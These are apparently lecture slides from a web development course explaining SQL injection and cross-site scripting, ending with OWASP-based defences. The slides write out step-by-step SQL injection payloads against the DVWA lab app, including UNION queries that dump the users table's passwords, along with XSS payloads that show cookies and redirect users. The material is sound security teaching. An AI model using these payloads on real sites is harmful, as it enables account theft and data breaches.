sql injection and xss
TRANSCRIPT
webdev@rgusql injection and XSS
a word of warning
Everything that we are going over today, while practical, is meant for penetration testing only! You’ll get in a lot of trouble if you use this on live websites that you don’t own!
Also…the fuzz will come after you.
what is sql injection
what is sql injection
SQL injection (also known as SQL fishing) is a technique often used to attack data driven applications.
what is sql injection
This is done by including portions of SQL statements in an entry field in an attempt to get the website to pass a newly formed rogue SQL command to the database (e.g., dump the database contents to the attacker).
SQL injection is a code injection technique that exploits a security vulnerability in an application's software.
what is sql injection
This is done by including portions of SQL statements in an entry field in an attempt to get the website to pass a newly formed rogue SQL command to the database (e.g., dump the database contents to the attacker).
what is sql injection
The vulnerability happens when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and unexpectedly executed.
what is sql injection
The vulnerability happens when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and unexpectedly executed.
SQL injection is mostly known as an attack vector for websites but can be used to attack any type of SQL database.
what is sql injection
http://www.bugtracker.com/bugs.php?bugID=007
SELECT * FROM softwareBugs WHERE bugID = $_GET[‘bugID’]
what is sql injection
http://www.bugtracker.com/bugs.php?bugID=007
SELECT * FROM softwareBugs WHERE bugID = 007
what is sql injection
http://www.bugtracker.com/bugs.php?bugID=007 OR TRUE
SELECT * FROM softwareBugs WHERE bugID = 007 OR TRUE
can be used to gain access to all bugs
worse example
http://www.bugtracker.com/changepassword.php?userID=1234&pass=mynewpass
UPDATE Users SET password = ‘pass’ WHERE userID = 1234
worse example
http://www.bugtracker.com/changepassword.php?userID=1234 OR TRUE &pass=mynewpass
changes all user passwords!
UPDATE Users SET password = ‘pass’ WHERE userID = 1234 or TRUE
this is easy though…who would get caught out with an
sql injection attack!?
Archos 2014
Wordpress February 2015
Drupal Attack March 2015
in-depth SQL injection
attack
dvwa
This is DVWA.All of our SQL injection is going to happen using this userID box
1
1
No SQL injection, just putting normal data into the form
%' or '0'='0
%' or '0'='0
All information from a table, ‘Always True’ injection
%' or 0=0 union select null, version() #
%' or 0=0 union select null, version() #
Finding out server information
%' or 0=0 union select null, user() #
%' or 0=0 union select null, user() #
Finding out the database location
%' or 0=0 union select null, database() #
%' or 0=0 union select null, database() #
finding out the name of the database
%' and 1=0 union select null, table_name from information_schema.tables #
%' and 1=0 union select null, table_name from information_schema.tables #
Information_Schema part of the database
%' and 1=0 union select null, table_name from information_schema.tables where table_name like 'user%'#
%' and 1=0 union select null, table_name from information_schema.tables where table_name like 'user%'#
finding tables that mention the word ‘user’ at the start
%' and 1=0 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name = 'users' #
%' and 1=0 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name = 'users' #
Finding the names of all the fields from the table ‘users’
%' and 1=0 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users #
%' and 1=0 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users #
finding all of the information stored in the table users
And this is what we are after! The admin password!
what is Cross site Scripting
What is cross site scripting
Cross-site scripting (XSS) is a type of computer security vulnerability typically found in Web applications.
XSS enables attackers to inject client-side script into Web pages viewed by other users.
A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same origin policy.
What is cross site scripting
In Addition, the attacker can send input (e.g., username, password, session ID, etc) which can be later captured by an external script.
The victim's browser has no way to know that the script should not be trusted, and will execute the script. Because it thinks the script came from a trusted source, the malicious script can access any cookies, session tokens, or other sensitive information retained by the browser and used with that site.
<script>alert("This is a XSS Exploit Test")</script>
<script>alert("This is a XSS Exploit Test")</script>
Displays an alert message when a person visits the screen
<iframe src="http://www.cnn.com"></iframe>
<iframe src="http://www.cnn.com"></iframe>
Creates an iframe that can hold information from another site
<script>alert(document.cookie)</script>
<script>alert(document.cookie)</script>
Displays an alert message with the users current cookie
<script>window.location=“http://www.example.com”</script>
Auto redirects a user
(I’m sorry)
<script>alert("This is a XSS Exploit Test")</script>
<iframe src="http://www.cnn.com"></iframe>
<script>alert(document.cookie)</script>
<script>window.location=“http://www.example.com”</script>
simple test
Embed content into the page
Get the current cookie used by a user
redirect the user to a different page
protecting against sql
injection and xss
sql injection
Prepared Statements Stored Procedures Escaping all user supplied input
Least Privilege White List Validation
https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
Never insert untrusted data except in allowed locations HTML Escape before inserting untrusted data into HTML Attribute Escape… Javascript Escape… CSS Escape… URL Escape…
In other words…check EVERYTHING! XSS is very common and is really easy to exploit
XSS
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
We’re going to do a lot more protection in the lab…don’t worry!
is that it!?
Going to give you a chance to improve a websites security in terms of SQL injection and XSS vulnerabilities.
If you want to try some of these things out yourself…we’re working on it
Getting DVWA to work properly on a secure network is difficult, even ours!
webdev@rgusql injection and XSS